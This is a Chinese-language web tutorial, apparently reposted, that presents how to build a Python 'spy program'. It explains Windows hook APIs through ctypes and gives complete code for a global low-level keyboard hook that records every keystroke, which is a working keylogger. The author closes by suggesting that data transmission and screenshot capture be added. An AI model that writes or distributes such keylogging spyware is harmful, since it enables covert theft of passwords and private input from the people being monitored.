您好,登錄后才能下訂單哦!
知識點
這次我們使用python來打造一款間諜程序
程序中會用到許多知識點,大致分為四塊
win32API 此處可以在MSDN上查看
Python基礎重點在cpytes庫的使用,使用方法請點擊此處
C語言基礎
Hook
程序的基本原理在于通過注冊Hook,記錄系統事件
那么什么是Hook呢
Hook 技術又叫做鉤子函數,系統在調用函數之前,鉤子程序就先捕獲該消息,鉤子函數先得到控制權,這時鉤子函數既可以加工處理(改變)該函數的執行行為,還可以強制結束消息的傳遞
注冊Hook時我們需要先導入DLL庫,在Python中我們使用ctypes來導入,導入方法如下
user32 = CDLL("user32.dll") kernel32 = CDLL("kernel32.dll")
我們導入了user32.dll和kernel32.dll
這兩個DLL有什么用處呢
user32.dll 是Windows用戶界面相關應用程序接口,用于包括Windows處理,基本用戶界面等特性,如創建窗口和發送消息
kernel32.dll 控制著系統的內存管理、數據的輸入輸出操作和中斷處理
流程部分
知道了我們要使用什么樣的工具,那么第一步應該怎么做呢
1.首先我們需要先注冊Hook到系統上,通過user32.dll中的SetWindowsHookExA函數,我們可以在系統上注冊鉤子
HHOOK SetWindowsHookExA( int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId );
通過查看文檔我們看到SetWindowsHookExA函數的參數及參數類型如上所示,詳細文檔點擊此鏈接查看
通過文檔我們看到第一個參數idHook中填入鉤子的類型
WH_KEYBOARD_LL的常量值為13代表的意思是監視低級鍵盤輸入事件,我們此處來監聽鍵盤事件
第二個參數lpfn代表指向鉤子過程的指針,要填入鉤子過程(函數),我們可以在此處來添加額外代碼達到我們想要達成的目的
第三個參數hmod表示為DLL句柄,我們可以使用kernel32中的GetModuleHandleW來獲取句柄
最后一個參數dwThreadId我們填入0代表與同一桌面上所有的線程關聯
代碼如下
user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)
如何使用Python來編寫我們的鉤子過程呢,通過ctypes文檔我們可以得知windows下使用WINFUNCTYPE來創建函數
此時我們發現有WINFUNCTYPE和CFUNCTYPE兩個函數,具體要使用哪一個呢,這兩個的區別為
WINFUNCTYPE 為Windows下獨有的,通過使用使用stdcall調用約定的函數
CFUNCTYPE 使用標準C調用約定的函數
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
因為我們調用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL會使用LowLevelKeyboardProc回調函數,同時我們也需要在Python定義它
LowLevelKeyboardProc數據結構如下
LRESULT CALLBACK LowLevelKeyboardProc( _In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam );
按照官方文檔提示如果nCode小于零,則掛鉤過程必須將消息傳遞給CallNextHookEx函數,而無需進一步處理,并且應返回CallNextHookEx返回的值
我們轉換為Python代碼
class KBDLLHOOKSTRUCT(Structure): _fields_ = [ ('vkCode', DWORD), ('scanCode', DWORD), ('flags', DWORD), ('time', DWORD), ('dwExtraInfo', DWORD)] def hookProc(nCode, wParam, lParam): if nCode < 0: return user32.CallNextHookEx(hooked, nCode, wParam, lParam) else: # 此處插入我們的代碼 pass return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
最后在我們退出程序時還需要刪除Hook,不然大量的Hook會使系統運行緩慢,雖然在Windows 7及更高版本上,該鉤子會被靜默刪除而不被調用。應用程序無法知道掛鉤是否已刪除。我們還是主動進行刪除
刪除需要使用user32.dll的UnhookWindowsHookEx,參數為Hook句柄
user32.UnhookWindowsHookEx(hooked)
下面貼上全部代碼
import sys from ctypes import * from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM user32 = CDLL("user32.dll") kernel32 = CDLL("kernel32.dll") class KBDLLHOOKSTRUCT(Structure): _fields_ = [ ('vkCode', DWORD), ('scanCode', DWORD), ('flags', DWORD), ('time', DWORD), ('dwExtraInfo', DWORD)] def uninstallHookProc(hooked): if hooked is None: return user32.UnhookWindowsHookEx(hooked) hooked = None def hookProc(nCode, wParam, lParam): if nCode < 0: return user32.CallNextHookEx(hooked, nCode, wParam, lParam) else: if wParam == 256: if 162 == lParam.contents.value: print("Ctrl pressed, call Hook uninstall()") uninstallHookProc(hooked) sys.exit(-1) capsLock = user32.GetKeyState(20) # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT)) if lParam.contents.value==13: print("\n") elif capsLock: print(chr(lParam.contents.value),end="") else: print(chr(lParam.contents.value+32),end="") return user32.CallNextHookEx(hooked, nCode, wParam, lParam) def startKeyLog(): msg = MSG() user32.GetMessageA(byref(msg), 0, 0, 0) def installHookProc(hooked, pointer): hooked = user32.SetWindowsHookExA( 13, pointer, kernel32.GetModuleHandleW(), 0 ) if not hooked: return False return True HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD)) pointer = HOOKPROC(hookProc) hooked = None if installHookProc(hooked, pointer): print("Hook installed") try: msg = MSG() user32.GetMessageA(byref(msg), 0, 0, 0) except KeyboardInterrupt as kerror: uninstallHookProc(hooked) print("Hook uninstall...") else: print("Hook installed error")
貼上我們的效果圖
我們還可以再添加上額外的代碼比如數據傳輸,截屏等等 ^_^
如何想要了解更多的只是請點擊這里把 => 地址
總結
以上就是使用Python打造一款間諜程序的流程分析的詳細內容,更多關于python間諜程序請關注億速云其它相關文章!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。